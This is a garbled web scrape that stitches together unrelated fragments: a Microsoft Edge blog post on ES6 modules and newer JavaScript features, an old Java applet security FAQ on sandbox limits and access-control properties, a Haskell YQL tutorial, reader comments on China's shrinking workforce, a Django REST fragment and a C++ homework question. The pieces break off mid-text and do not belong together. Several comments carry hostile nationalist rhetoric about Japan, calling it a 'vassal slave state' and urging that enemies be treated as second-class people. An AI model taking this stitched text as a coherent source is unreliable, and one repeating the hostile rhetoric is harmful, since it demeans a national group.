- This weighty style seems like a good fit for my gauss seidel and iterative LQR solvers. A big problem I hit there was getting all the information to the outside, which is a similar issue to getting the weights around in a neural net. | https://www.philipzucker.com/neural-networks-with-weighty-lenses-dioptics/ | CC-MAIN-2021-43 | refinedweb | 1,457 | 64.88 |
Previewing ES6 Modules and more from ES2015, ES2016 and beyond
Chakra, the recently open-sourced JavaScript engine that powers Microsoft Edge and Universal Windows applications, has been pushing the leading edge of ECMAScript language support. Most of ES2015 (aka ES6) language support is already available in Edge, and last week’s Windows Insider Preview build 14342 brings more ES6 capabilities including modules, default parameters, and destructuring. We’re not stopping there – Edge also supports all ES2016 (aka ES7) proposals – the exponentiation operator and Array.prototype.includes – as well as future ECMAScript proposals such as Async Functions and utility methods like Object.values/entries and String.prototype.padStart/padEnd.
ES6 Modules
Modules let you write componentized and sharable code. Without complete support from any browser, developers have already started to get a taste of ES6 modules through transpiling from tools such as TypeScript or Babel. Edge now has early support for ES6 modules behind an experimental flag.
Modules aren’t exactly new to JavaScript with formats such as Asynchronous Module Definition (AMD) and CommonJS predating ES6. The key value of having modules built in to the language is that JavaScript developers can easily consume or publish modular code under one unified module ecosystem that spans both client and server. ES6 modules feature a straightforward and imperative-style syntax, and also have a static structure that paves the way for performance optimizations and other benefits such as circular dependency support. There are times when modules need to be loaded dynamically, for example some modules might only be useful and thus loaded if certain conditions are met in execution time. For such cases, there will be a module loader which is still under discussion in the standardization committee and will be specified/ratified in the future.
ES6 Modules in Microsoft Edge
To light up ES6 modules and other experimental JavaScript features in Edge, you can navigate to about:flags and select the “Enable experimental JavaScript features” flag.
The “Experimental JavaScript features” flag at about:flags
As a first step, Edge and Chakra now support all declarative import/export syntax defined in ES6 with the exception of namespace import/export (import * as name from “module-name” and export * from “module-name”). To load modules in a page, you can use the <script type=”module”> tag. Here is an example of using a math module:
[code language=”html”]
/* index.html */
…
<script type=’module’ src=’./app.js’>
…
[/code]
[code language=”javascript”]
/* app.js */
import { sum } from ‘./math.js’;
console.log(sum(1, 2));
/* math.js */
export function sum(a, b) { return a + b; }
export function mult(a, b) { return a * b; }
[/code]
Implementation: static modules = faster lookup
One of the best aspects of ES6’s modules design is that all import and export declarations are static. The spec syntactically restricts all declarations to the global scope in the module body (no imports/exports in if-statement, nested function, eval, etc.), so all module imports and exports can be determined during parsing and will not change in execution.
From an implementation perspective, Chakra takes advantage of the static nature in several ways, but the key benefit is to optimize looking up values of import and export binding identifiers. In Microsoft Edge, after parsing the modules, Chakra knows exactly how many exports a module declares and what they are all named, Chakra can allocate the physical storage for the exports before execution. For an import, Chakra resolves the import name and create a link back to the export it refers to. The fact that Chakra is aware of the exact physical storage location for imports and exports allows it to store the location in bytecode and skip dynamically looking up the export name in execution. Chakra can bypass much of the normal property lookup and cache mechanisms and instead directly fetch the stored location to access imports or exports. The end result is that working with an imported object is faster than looking up properties in ordinary objects.
Going forward with modules
We have taken an exciting first step to support ES6 modules. As the experimental status suggests, the work towards turning ES6 modules on by default in Edge is not fully done yet. Module debugging in the F12 Developer Tools is currently supported in internal builds and will be available for public preview soon. Our team is also working on namespace import/export to have the declarative syntax fully supported and will look into module loader once its specification stabilizes. We also plan to add new JSRT APIs to support modules for Chakra embedders outside of Edge.
More ES6 Language Features
Microsoft Edge has led the way on a number of ES6 features. Chakra has most of ES6 implemented and on by default including the new syntax like let and const, classes, arrow functions, destructuring, rest and spread parameters, template literals, and generators as well as all the new built-in types including Map, Set, Promise, Symbol, and the various typed arrays.
In current preview builds, there are two areas of ES6 that are not enabled by default – well-known symbols and Proper Tail Calls. Well-known symbols need to be performance optimized before Chakra can enable them – we look forward to delivering this support in an upcoming Insider flight later this year.
The future of Proper Tail Calls, on the other hand, is somewhat in doubt – PTC requires a complex implementation which may result in performance and standards regressions in other areas. We’re continuing to evaluate this specification based on our own implementation work and ongoing discussions at TC39.
ES2016 & Beyond with the New TC39 Process
TC39, the standards body that works on the ECMAScript language, has a new GitHub-driven process and yearly release cadence. This new process has been an amazing improvement so far for a number of reasons, but the biggest is that it makes it easier for implementations to begin work early for pieces of a specification that are stable and specifications are themselves much smaller. As such, Chakra got an early start on ES2016 and are now shipping a complete ES2016 implementation. ES2016 was finalized (though not ratified) recently and includes two new features: the exponentiation operator and Array.prototype.includes.
The exponentiation operator is a nice syntax for doing
Math.pow and it uses the familiar
** syntax as used in a number of other languages. For example, a polynomial can be written like:
[code language=”javascript”]let result = 5 * x ** 2 – 2 * x + 5;[/code]
Certainly a nice improvement over Math.pow, especially when more terms are present.
Chakra also supports Array.prototype.includes which is a nice ergonomic improvement over the existing Array.prototype.indexOf method. Includes returns
true or
false rather than an index which makes usage in Boolean contexts lots easier.
includes also handles NaN properly, finally allowing an easy way to detect if NaN is present in an array.
Meanwhile, the ES2017 specification is already shaping up and Chakra has a good start on some of those features as well, namely Object.values and entries, String.prototype.padStart and padEnd, and SIMD. We’ve blogged about SIMD in the past, though recently Chakra has made progress in making SIMD available outside of asm.js. With the exception of Object.values and entries, these features are only available with experimental JavaScript features flag enabled.
Object.values & Object.entries are very handy partners to Object.keys. Object.keys gets you an array of keys of an object, while Object.values gives you the values and Object.entries gives you the key-value pairs. The following should illustrate the differences nicely:
[code language=”javascript”]let obj = { a: 1, b: 2 };
Object.keys(obj);
// [ ‘a’, ‘b’ ]
Object.values(obj);
// [1, 2]
Object.entries(obj);
// [ [‘a’, 1], [‘b’, 2] ]
[/code]
String.prototype.padStart and String.prototype.padEnd are two simple string methods to pad out the left or right side of a string with spaces or other characters. Not having these built-in has had some rather dire consequences recently as a module implementing a similar capability was removed from NPM. Having these simple string padding APIs available in the standard library and avoiding the additional dependency (or bugs) will be very helpful to a lot of developers.
Chakra is also previewing SIMD, with the entire API surface area in the stage 3 SIMD proposal completed, as well as a fully-optimized SIMD implementation integrated with asm.js. We are eager to hear feedback from you on how useful these APIs are for your programs.
You can try ES2015 modules and other new ES2015, ES2016, and beyond features in Microsoft Edge, starting with the latest Windows Insider Preview and share your thoughts and feedback with us on Twitter at @MSEdgeDev and @ChakraCore or file an issue on the ChakraCore GitHub. We look forward to hearing your input!
― Taylor Woll, Software Engineer
― Limin Zhu, Program Manager
― Brian Terlson, Program Manager | https://blogs.windows.com/msedgedev/2016/05/17/es6-modules-and-beyond/ | CC-MAIN-2020-24 | refinedweb | 1,479 | 52.8 |
Hey,
I have a couple of c# scripts with custom classes in them in my scene. Each one of those also has an editor extension. So far it works pretty good. But when I change small things in the code and then build/debug the code in Monodevelop it looses the values I entered previously in the editor.
my script is something like this:
public class myScript
{
public int valueA;
public int[] valuesOfA;
public class myClass
{
public int insideClassA;
public int[] insideClassValuesOfA;
}
myClass myClassVariable = new myClass();
}
so if I assign the values myClassVariable.insideClassA, then they will disappear after the build/debug. But if I assign valueA, which is outside the class it will be saved. I don't quite get why it keeps getting deleted...
myClassVariable.insideClassA
valueA
where are you assigning values to insideClassA?
insideClassA
Answer by cregox
·
Nov 14, 2014 at 04:09 PM
You definitely should go for some video tutorials, as there's a lot to learn there.
There are 2 typical ways of losing "variable" values:
If you assign values on the editor while playing, they will be lost when you stop playing.
And if you have values assigned on the script declaration, they will be overwritten by editor values.
Those are a few points covered on tutorials, I believe.
Seriously I don't think I need to watch more video tutorials. I don't mean hit Run inside Unity. I'm well aware that changes in Playtime won't get saved. That's not what I'm talking about. I mean the compilation of $$anonymous$$onodevlop.
As when I usually assign a value inside a custom Inspector (values which are not inside the editor extension script but inside the "base" script) then those values will remain even if I recompile the script, as long as I don't delete that variable inside the script.
So I would expect the same behavior if I use a custom class which as far as I know mostly behaves like a container of different variables.
I only mean your question evidently shows basic doubts that is everywhere. When it gets into a video tutorial, it means it's asked a lot. And asking "the internet" repeated questions is usually the worst way to go.
For a few amenities: I took the liberty to move your "answer" as a proper comment to my answer, as it clearly was the intention. Also there's no special name (such as "custom") for classes you create. They're still classes.
Finally, if you think you can't find your answer anywhere, you should ask it in a much more clear way. I, for one, did try to help with what I could understand from your question. Some people here are much better than me for understanding what newbies mean in general, maybe you get lucky if they see your question and find enough will to answer it. Try giving steps to reproduce the problem. Sometimes when you do this, you can find the answer just while preparing the question properly.
We can't assign values to an inner class in the editor / inspector. In my experience, compiling, be it on Unity or $$anonymous$$onodevelop (which I only use for debugging, eventually) never ever "deleted" variable values anywhere. And you didn't answer my very basic question I commented in your question. I find it too hard to understand what you mean, if none of what I mentioned already.
$$anonymous$$aybe you do mean monodevelop debugging, though and I just haven't stumbled into that bug. That process is full of bugs from my brief experience. $$anonymous$$aybe it is something you're doing wrong without realizing... If it is within monodevelop, though, I agree it might be hard to find an answered question there.
Answer by razcrux
·
Apr 14, 2016 at 05:10 AM
@fred_gds
The answer you are looking for is you need to add:
[System.Serializable]
Above class variables if you want the editor to retain them when you.
A node in a childnode?
1
Answer
UnityScript auto-format?
0
Answers
How to write a shortcut for MonoDevelop editor?
1
Answer
Modify inspector
2
Answers
Editor Compiling New Changes
2
Answers | https://answers.unity.com/questions/831718/custom-classes-deleted-on-builddebug.html | CC-MAIN-2021-10 | refinedweb | 702 | 64.71 |
In this tutorial, we are going to build a simple but beautiful CRUD application using the Python Web Development Framework called Django.Installations and Setting Up Django
If you would like to do this project in a virtual environment, I’m sure there are many tutorials to help you create one. After you have created a virtual environment, proceed with this tutorial. If you do not care about virtual environment stuffs, also proceed.
$ pip install Django==2.0.5
2. Verify the Django version installed by running the command below:
$ django-admin --version
$ mkdir django_projects
2. Move into this directory with
cd django_projects
3. Create the project with
$ django-admin startproject CRUD $ cd CRUD
4. Run the development server
$ python manage.py runserver
You should see something like this
5. Navigate to on your browser and you should see something like this:
Congratulations!!!! You are now ready to start building the CRUD appBuilding the CRUD APP
Let us create an app called Crud in the CRUD project. Close the development server with Ctrl + C
Create the app with
$ python manage.py startapp Crud
So far, we have a directory structure like this
Open the settings.py file to specify the allowed hosts as well as add the Crud app to installed apps. You should have something like the below:
The Post Model
For our Crud app, we would like to be able to Create, Modify, View and Delete a post. Let us now define a post model in our models.py file. Open the models.py file in your favorite text editor and paste the below codes:
from django.db import models class Post(models.Model): title = models.CharField(max_length=120, help_text='title of message.') message = models.TextField(help_text="what's on your mind ...")
def str(self):
return self.title
Our post has a title and a message as fields.
Make Migrations
Run the commands below to make migrations:
$ python manage.py makemigrations
$ python manage.py migrate
Superuser
Let us now create a superuser to manage our application
Run the following in the terminal:
$ python manage.py createsuperuser
You will be prompted to enter a username, email address, password and password confirmation. If the superuser is successfully created, we can now run the development server and log on to the Django admin page. Run the development server with
$ python manage.py runserver
Navigate to on your browser and you should see something similar as below:
Enter the details to log in.
You should see a page similar to that below:
Our post is not displayed here since we have not registered it in the admin.
Open the admin.py file in a text editor and add the following codes:
from django.contrib import admin
from .models import Post #add this to import the Post model
admin.site.register(Post) #add this to register the Post model
Refresh the page again and this time you should see the post appear as below Python and Django Full Stack Web Developer Bootcamp
☞ Build a Backend REST API with Python & Django - Advanced
☞ Python Django Dev To Deployment
☞ Build Your First Python and Django Application
☞ How To Set Up Django with Postgres, Nginx, and Gunicorn on Ubuntu 16.04
☞ Building a Universal Application with Nuxt.js and Django
☞ Django Tutorial: Building and Securing Web Applications
☞ Building a Weather App in Django
Originally published on
🔥Intellipaat Django course: 👉This Python Django tutorial will help you learn what is django web development &....
This article is a definitive guide for starters who want to develop projects with RESTful APIs using Python, Django and Django Rest Framework.
This article is a definitive guide for starters who want to develop projects with RESTful APIs using Python, Django and Django Rest Framework.Introduction": "{/other_user}", "gists_url": "{/gist_id}", "starred_url": "{/owner}{/repo}", "subscriptions_url": "", "organizations_url": "", "repos_url": "", "events_url": "{/privacy}",
REST APIs with Django Rest FrameworkREST APIs with Django Rest Framework
$ python manage.py migrate
The' ]
Since we haven't setup our
POST requests yet, we will be populating the database through django's admin panel.
To do that, create a superuser account
admin with password
1234password.
$ python manage.py createsuperuser --email [email protected] -:
POST /api/v1/posts/create/!Source! | https://morioh.com/p/16d8613eba4e | CC-MAIN-2020-05 | refinedweb | 693 | 57.16 |
#Car #Stock #Photos API with bulk download option
CarImagery.com is a website that gives business’ in the auto trade industry access to thousands of quality, licensed stock photos of cars. To spruce up catalogue pages with glossy images of cars.
For $19.99 per month, you get unlimited access to an API, that will look up car images, and return one to you based on your search criteria, or if you prefer to hold the data locally on your own server, you can download our 100MB database of car imagery and data. You can preview a sample of it on the website. – This is updated every 6 months to account for new cars entering the market.
There is a free version to try out, but it is not licensed for commercial or educational use, and will block excessive usage.
For .NET developers, here’s some sample code:
Open a new project in Visual Studio, in this case, we are assuming a console application, but the steps are identical for other project types too.
● Right click on the project, and select Add > Service Reference
● Change the namespace to CarImagery
● Enter the address into the address bar.
● Press OK.
● Enter the following code in the Main() method
var carImagery = new CarImagery.apiSoapClient(“apiSoap”);
var strUrl = carImagery.GetImageUrl(“Ford Fiesta”); System.Diagnostics.Process.Start(strUrl);
● Press Run, and your default browser will open with an image of a Ford Fiesta car. | https://blog.dotnetframework.org/2016/11/09/car-stock-photos-api-with-bulk-download-option/ | CC-MAIN-2018-30 | refinedweb | 239 | 62.17 |
JDK 1.1 provides the basic technology for loading and authenticating
signed classes. This enables browsers to run trusted applets in a
trusted environment. This does not make obselete the need to run
untrusted applets in a secure way. In the release following JDK 1.1,
we will provide tools for finer-grained control of flexible security
policies.
See the chronology page to
check on the status of security-related bugs..
There are other specific capabilities denied to applets loaded
over the net, but most of the applet security policy is described by
those two paragraphs above. Read on for the gory details.
In Java-enabled browsers, untrusted applets cannot read or write files at
all. By default, downloaded applets are considered untrusted. There are
two ways for an applet to be considered trusted:
Sun's appletviewer allows applets to read files that reside in
directories on the access control lists.
If the file is not on the client's access control list, then applets
cannot access the file in any way. Specifically, applets cannot
Applets loaded into a Java-enabled browser can't read files.
Sun's appletviewer allows applets to read files that are named on the
access control list for reading. The access control list for reading
is null by default, in the JDK. You can allow applets
to read directories or files by naming them in the
acl.read property in your
~/.hotjava/properties file.
acl.read
~/.hotjava/properties
Note: The "~" (tilde) symbol is used on UNIX
systems to refer to your home directory. If you install a web browser
on your F:\ drive on your PC, and create a top-level
directory named .hotjava, then your properties file is
found in F:\.hotjava\properties.
~
F:\
.hotjava
F:\.hotjava\properties
For example, to allow any files in the directory home/me
to be read by applets loaded into the appletviewer, add this line to
your ~/.hotjava/properties file.
home/me
acl.read=/home/me
acl.read=/home/me/somedir/somefile
acl.read=/home/foo:/home/me/somedir/somefile
acl.write=/home/me/somedir/somefile
acl.write=/tmp:/home/me/somedir/somefile
Bear in mind that if you open up your file system for writing by
applets, there is no way to limit the amount of disk space an applet
might use.
In both Java-enabled browsers and the appletviewer, applets can read
these system properties by invoking
System.getProperty(String key):
System.getProperty(String key)
key meaning
____________ ______________________________
java.version Java version number
java.vendor Java vendor-specific string
java.vendor.url Java vendor URL
java.class.version Java class version number
os.name Operating system name
os.arch Operating system architecture
os.version Operating system version
file.separator File separator (eg, "/")
path.separator Path separator (eg, ":")
line.separator Line separator
key meaning
____________ _____________________________
java.home Java installation directory
java.class.path Java classpath
user.name User account name
user.home User home directory
user.dir User's current working directory
System.getProperty(key)
For example,
String s = System.getProperty("os.name");
There's no way to hide the above ten system properties
There's no way to allow an applet loaded into a Java-enabled browser
to read system properties that they aren't allowed to read by default.
To allow applets loaded into the appletviewer to read the property
named by key, add the property
key.applet=true to your ~/.hotjava/property
file. For example, to allow applets to record your user name, add
this line to your ~/.hotjava/properties file:
key
key.applet=true
~/.hotjava/property
user.name.applet=true.
codebase
applet
For example, if you try to do this from an applet that did not
originate from the machine foo.com, it will fail with a security
exception:
Socket s = new Socket("foo.com", 25, true);
Be sure to name the originating host exactly as it was specified when
the applet was loaded into the browser.
That is, if you load an HTML page using the URL
foo.state.edu
There is no explicit support in the JDK applet API for persistent
state on the client side. However, an applet can maintain its own
persistent state on the server side. That is, it can create files on
the server side and read files from the server side.
No, applets loaded over the net are not allowed to start programs on the
client. That is, an applet that you visit can't start some rogue
process on your PC. In UNIX terminology, applets are not allowed to
exec or fork processes. In particular, this means that applets can't
invoke some program to list the contents of your file system, and it
means that applets can't invoke System.exit() in an attempt to kill
your web browser. Applets are also not allowed to manipulate threads
outside the applet's own thread group.
String
final
t.currentThread()
t
Thread
class Parent { protected int x; }
class Child extends Parent { ... }
Child
x
For example, programmers can choose to implement sensitive functions
as private methods. The compiler and the runtime checks ensure that
no objects outside the class can invoke the private methods.
There are two different ways that applets are loaded by a Java system.
The way an applet enters the system affects what it is allowed to do.
If an applet is loaded over the net, then it is loaded by the applet
class loader, and is subject to the restrictions enforced by the applet
security manager.
If an applet resides on the client's local disk, and in a directory
that is on the client's CLASSPATH, then it is loaded by the file
system loader. The most important differences are
Java-enabled browsers use the applet class loader to
load applets specified with file: URLs. So, the restrictions and
protections that accrue from the class loader and its associated
security manager are now in effect for applets loaded via file: URLs.
This means that if you specify the URL like so:
Location: file:/home/me/public_html/something.html
Applets loaded over the net are loaded by the applet class loader.
For example, the appletviewer's applet class loader is implemented by
the class sun.applet.AppletClassLoader.
The class loader enforces the Java name space hierarchy. The class
loader guarantees that a unique namespace exists for classes that come
from the local file system, and that a unique namespace exists for
each network source. When a browser loads an applet over the net,
that applet's classes are placed in a private namespace associated
with the applet's origin. file for purposeful violations of the language
type rules and name space restrictions. The verifier ensures that
The verifier accomplishes that by doing a data-flow analysis of the
bytecode instruction stream, along with checking the class file
format, object signatures, and special analysis of
finally clauses that are used for Java exception
handling.
finally
Details on the verifier's design and
implementation were presented in a paper by Frank Yellin at the
December 1995 WWW conference in Boston.
A web browser uses only one class loader, which is established
at start-up. Thereafter, the system class loader cannot
be extended, overloaded, overridden or replaced. Applets cannot
create or reference their own class loader.
The applet security manager is the Java mechanism for enforcing the
applet restrictions described above. The appletviewer's applet
security manager is implemented by sun.applet.AppletSecurity.
A browser may only have one security manager. The security manager is
established at startup, and it cannot thereafter be replaced,
overloaded, overridden, or extended. Applets cannot create or
reference their own security manager.
The following table is not an exhaustive list of applet capabilities.
It's meant to answer the questions we hear most often about what
applets can and cannot do.
Key:
Stricter ------------------------> Less strict
NN NL AN AL JS
read file in /home/me, no no no yes yes
acl.read=null
read file in /home/me, no no yes yes yes
acl.read=/home/me
write file in /tmp, no no no yes yes
acl.write=null
write file in /tmp, no no yes yes yes
acl.write=/tmp
get file info, no no no yes yes
acl.read=null
acl.write=null
get file info, no no yes yes yes
acl.read=/home/me
acl.write=/tmp
delete file, no no no no yes
using File.delete()
delete file, no no no yes yes
using exec /usr/bin/rm
read the user.name no yes no yes yes
property
connect to port no no no yes yes
on client
connect to port no no no yes yes
on 3rd host
load library no yes no yes yes
exit(-1) no no no yes yes
create a popup no yes no yes yes
window without
a warning.
Files:
user.name
user.home
<applet>
appletviewer
java
java coolApplication
The server is also known as the originating host.
The terms server and client are sometimes used to refer
to computers, and are sometimes used to refer to computer programs.
For example, is a server, and the httpd process running on is its server process. My computer at home is a client,
and the web browser running on my computer at home acts as the client
process. | http://java.sun.com/sfaq/ | crawl-001 | refinedweb | 1,547 | 57.47 |
>> answer?
japns did not fall in love with, they are just being made abjectly submissive to the conqueror.
.
like breaking or domesticing an animal, you'd have to whip them and give them goody bags to train them into submission.
.
that's why people should treat their defeated but unrepentant war time war crime awashed enemy by taking no prisoner but instead treat them as second class people, then and only then they will 'fall in love' with you, but watch out your back in the middle of sleep always, pearl harbour may be just around the corner..
The addition to the globally available Chinese labour force is not by any means over, as people migrate from the land,(where their income is very low) to second and third tier cities,Chinese incomes will continue to rise driven by urbanisation as well as productivity growth.
As productivity growth remains high (17% in the private sector a couple of years ago) incomes will continue to rise. Infrastucture is likely to continue to be better than in a lot of South and South East Asia.
The jobs which will go to Bangladesh and Vietnam will be the very low paid ones which require only a sewing machine (or similar) as capital investment. Industries like Autos and electronics which have complex supply chains and a need for scale will continue to grow in China. China will still have a labour force of nearly a billion. The only real labour shortage will be for very low paying jobs which will either move into the Chinese countryside or to the Indian subcontinent (or SE Asia).
This does not mean the Chinese economy will collapse or become uncompetitive, only that development will continue and really low wage jobs will migrate. China will really only have a serious problem if productivity growth stagnates (unlikely until the economy becomes a lot more urbanised)or investment ceases to make a decent return (which may happen without further reforms).
By the year 2020 twenty million Chinese men will find shortage of women for marriage. They are already trying to import girls from such countries as Myammar illegaly, it will not help much. The situation will further worsen the number of workers availabe after say 40 years, while rich young boys and girls are immigrating to abroad at a rate of 70 thousand per month!!.
but however you twist and cut it, it does not change the fact reminding the world that japan is still a vassal slave state with foreign troops and bases stationed all over japan. japanese are still treated as second class citizens at best in their own country by the occupying troops.
.
china may or may not have labour shortage problems in the future, but in order for japan to be independent and free, it must let ryukyus islands to be indepedent and free first.
.
only letting ryukyus will asian nations china, india and korea will land a hand to rescue japan with money loans and more trades..
Well, this article is a bit overreacting. China's working population has been abnormally high and now it is time to shrink. Why is it such a big deal for a country with already more than 1.3 billion people? Look on the bright side. I can say that population decline is a postive thing since each worker can become more efficient than before..)
"Never before has the global economy benefited from such a large addition of human energy."
Stopped reading right there. The author shows an extreme lack of understanding on any real "benefit" to the world economy that the hollowing out of the US and EU's industrial labor force at the expense of near slave wage labor from China.
I should have known better than to expect anything of real substance about China from The Economist, or most western based rags in the first place.
Michael Pettis is a much more reliable source of info on what's actually going on in China. a good news. However, I had to say this is a exam for China, examing the pension system and health system. Please also focus that there are two people affording four elder people's living. If somebody realized Japan deeply, he/she will notice that the elder become a major social problem, This is also one reason of slow increase of Japan Economic.
It is not the number of working people that matters but the quality of the work force that does. Only Indian nationalists, like the Rajs of the old, will talk endlessly about their country's "population dividend" as if half a billion uneducated people stuck in poverty is going build the next superpower.
A slowly declining labor pool at this point is good news. China is already suffering serous environmental consequences of break neck industrialization sustained by the need to maintain social stability through job creation. The decreasing number of youth entering the labor force will give the policy makers the needed slack to transition the economy away from the present mix of manufacturing/infrastructural/housing into a more sustainable mix. As long as the productivity increases, the economy can keep on growing.
On the flip side of this is the long term 4-2-1 problem regarding retirement and pension. I feel the policy response to this is to abolish the 1 child policy or at least change it to a regional quota. Provinces like Tibet should have no limit on the number of children regardless of ethnicity while coastal provinces could have a ceiling of 2 kids per family..
This is the whole point of the 1-child policy isn't it? Allowing each family to pool all their resources into 1 child's education?
I think Chinese workers' productivity have far more impact on the world's economy than the total number in the labor force, a few hundred million competing knowledge workers is not going to be nearly as beneficial to western economies as a hundred million low cost labor.
The point of the one child policy was a fear of over-population. I was going to say some long-winded thing about productivity, but, in a nutshell, it really all depends.
I also agree that this (NBS data) shrinking of 3.45 m out of about 1 billion labor force in china is good news.
.
as chinese government is re-prioritising its industry with more emphasis on education, greenhouse gas emission reduction and productivity, chinese workers will be more educated, efficient, productive, healthier and richer. each worker decades later can support far more retirees and disabled than s/he can today.
.
chinese population will grow older, as every nation does with a growing economy, but they will also be helthier, richer and more prosperous.
.
this 'getting old before getting rich' nonsense is maliciouly intended, no chinese in his/her right mind should buy that.
China's high proportional growth rates are due to coming from a very low GDP/ capita base. In absolute terms (additional GDP/ capita in dollar terms), China has grown less quickly in the past decade than many other countries.
.
E.g. while in PPP 2005 dollars, China added $4,550 to per capita GDP between 2001 and 2011, absolute growth was higher in Poland, Slovakia, Czech Republic, Turkey, Estonia, Lithuania, Latvia, Sweden, Russia and South Korea.
.
---------------------
While it is true that China retains plenty of space for productivity catch up & rising incomes, and this will allow China's elderly to enjoy higher living standards than today, it's important to realise that China's current proportional growth rate will fall in the coming decades (absolute growth in per person incomes will not rise much above East European levels for the foreseeable future).
.
Already, scarcity of cheap labour, scarcity of land, scarcity of fresh water and scarce capacity of the environment to endure industrial activity is constraining potential for further volume0based investment and growth - China's economy has to pivot & reform, rather than simply scaling up. As that happens, investment returns will diminish and rates of capital accumulation will fall.
.
China will have a much richer future to look forward to, and will make a great contribution to the world. But it's important to keep everything in perspective. | http://www.economist.com/comment/1851971 | CC-MAIN-2014-49 | refinedweb | 1,377 | 57.91 |
Errors:
The problems:The problems:Code:------ Build started: Project: io, Configuration: Debug Win32 ------ Compiling... io.cpp k:\program files\io\io\io\Form1.h(320) : warning C4441: calling convention of '__stdcall ' ignored; '__clrcall ' used instead k:\program files\io\io\io\Form1.h(321) : warning C4441: calling convention of '__stdcall ' ignored; '__clrcall ' used instead Linking... io.obj : error LNK2020: unresolved token (06000004) io.Form1::Inp32 io.obj : error LNK2020: unresolved token (06000005) io.Form1::Out32 K:\Program files\io\io\Debug\io.exe : fatal error LNK1120: 2 unresolved externals Build log was saved at ":\Program files\io\io\io\Debug\BuildLog.htm" io - 3 error(s), 2 warning(s) ========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ==========
1. I can not get inpout32 to work.
2. I learned all I know from c++ for dummies and the VC++ help file. And I didn't say I learned it well..(I am going through the tutorials here as of today)
What I have to work with:
1. Visual C++ 2005 express edition. Not Visual studio - perhaps this is part of the problem?
2. Windows XP Professional Version 2002 Service pack 3.
3. A borrowed computer with an internet connection. (above xp computer has no internet)
4. unmedicated self taught programmer
5. abundant but limited supply of caffeine.
What I want to do:
I want to test the port LPT1 like this,
******************Code:test all pins display the results. save the results. zero all outputs retest inputs compare result to saved results loop test input make decisions based on result send output to individual pins break loop free up everything exit drink something good return (to bed)
so, I started a windows forms project named io.
In the
project properties,
linker,
input,
additional Dependencies
I added inpout.lib
I have included:
in the main io.cpp file.in the main io.cpp file.Code:#include "stdafx.h" #include "stdio.h" #include "string.h" #include "stdlib.h" #include "Form1.h" using namespace io; using namespace std;
and here are my protos:
and here is the first tiny bit of code that I puyt in just befor the errors started:and here is the first tiny bit of code that I puyt in just befor the errors started:Code:short _stdcall Inp32(short PortAddress); void _stdcall Out32(short PortAddress, short data);
Code:int reg; reg=Inp32(378); | http://cboard.cprogramming.com/windows-programming/126662-problems-inpout32-vcplusplus-express-2005-a.html | CC-MAIN-2015-48 | refinedweb | 396 | 60.51 |
The Yahoo! Query Language is an expressive SQL-like language that lets you query, filter, and join data across Web services. With YQL, apps run faster with fewer lines of code and a smaller network footprint.
It provides a standard interface to a whole host of web services and, more importantly, it's extensible to support other data sources. The Data Tables web site contains more information about how to expose your data via YQL.
I'm still trying to learn Haskell so I thought I'd try to knock together a quick program to see how you'd make a basic query and process the results using Haskell. To make a web service call, I'll use Haskell Http and process the results using Text.JSON. Both of these are available to install using cabal.
To make a YQL query we need to point at the right URL, select the output format and URL encode the query text. I've fixed the output format as JSON as it's more light weight.
yqlurl :: String
yqlurl = ""
json :: String
json = "&format=json"
yqlRequest :: String -> IO (Result JSValue)
yqlRequest query = do
rsp <- simpleHTTP (getRequest (yqlurl ++ urlEncode query ++ json))
body <- (getResponseBody rsp)
return (decodeStrict body :: Result JSValue)
So now we have something we can play with in the interpreter and make queries with. The really nice property of YQL is being able to do joins with sub-selects. This helps avoids doing round-trips to the server and means less boilerplate code to join items together. For example, let's say we want to find the URLs of Haskell images from Flickr.
*Main> yqlRequest "desc flickr.photos.search"
-- Returns a description of how to search photos in flickr
*Main> yqlRequest "select * from flickr.photos.search where text=\"haskell\""
-- Find images where the text is Haskell
*Main> yqlRequest "select urls from flickr.photos.info where
photo_id in (select id from flickr.photos.search where text=\"haskell\")"
-- Find the URLs for images
That gives us raw JSON back, the next step is to process this into something relevant. The following YQL selects upcoming events in Cambridge.
select description from upcoming.events where woeid in
(select woeid from geo.places where text="Cambridge, UK")
woeid provides a way of getting the latitude and longitude of any place on earth. This is consistently used in the APIs so you can feed it in as a sub select. Very neat!
The goal of this strange task is simply to get a list of strings of the descriptions of events coming up in Cambridge. Firstly I defined a couple of helper functions. These feel really clumsy, so I'm 99% sure that there is a better way to do it, but I can't see it.
getField :: [String] -> JSValue -> JSValue
getField (x:xs) (JSObject j) = getField xs (fromJust (get_field j x))
getField [] j = j
toString :: JSValue -> String
toString (JSString x) = fromJSString x
So now all we need to do is hook in a couple of functions to drill down into the JSON, yank the description out, and bundle it into a list.
eventsInCambridge :: String
eventsInCambridge = "Select description from upcoming.events where
woeid in (select woeid from geo.places where text=\"Cambridge, UK\")"
getEventList = do
response <- yqlRequest eventsInCambridge
return (case response of
Ok value -> (processEvents (getField ["query","results","event"] value))
Error msg -> undefined)
processEvents :: JSValue -> [String]
processEvents (JSArray events) = map (toString .(getField ["description"])) events
And the output from this is a giant list of descriptions of the upcoming events in Cambridge. You can see the example data by clicking here. | http://www.fatvat.co.uk/2009/11/haskell-yql-and-bit-of-json.html | CC-MAIN-2022-27 | refinedweb | 590 | 70.73 |
This method removes a node specified by name. When this map contains the attributes attached to an element, if the removed attribute is known to have a default value, the attribute immediately appears containing the default value as well as the corresponding namespace URI, local name, and prefix when applicable.
Node removeNamedItem(String sname) throws DOMException
Parameters:
sname - The nodeName of the node to remove.
NOT_FOUND_ERR: This error is raised if there is no node named name in this map.
NO_MODIFICATION_ALLOWED_ERR: This error is raised if this map is readonly.
For further details the user are requested to refer the website at | http://it.toolbox.com/wiki/index.php/RemoveNamedItem | crawl-002 | refinedweb | 102 | 54.42 |
#include <iomanip> #include <cmath> #include <fstream> #include <string> #include<string> #include<iostream> using namespace std; int main() { int num1 = 0; int num2 = 0; char again = 'y'; while (again=='y') { cout<<"Please enter two numbers to compare "<<endl; cin>>num1>>num2; cout<<"The two numbers entered in order were "<<num1<<" and "<<num2<<endl; if (num1<num2) { cout<<num2<<" is the larger of "<<num1<< " and "<<num2<<endl; } else if (num1>num2) { cout<<num1<<" is the larger of "<<num1<< " and "<<num2<<endl; } cout<<"\n Go again?(y/n): "; cin>>again; } return 0; }
Good day. My assignment is as follows: Write a c++ program using functions, that will accept 2 numbers from the keyboard and then determine which is
the larger and smaller of the two. There should be two functions:
1. getnumbers
Output within the 1st function should display
The two numbers entered in order were XXX and YYY
2. findbig
Output within the 2nd function should display
XXX is the larger of XXX and YYY
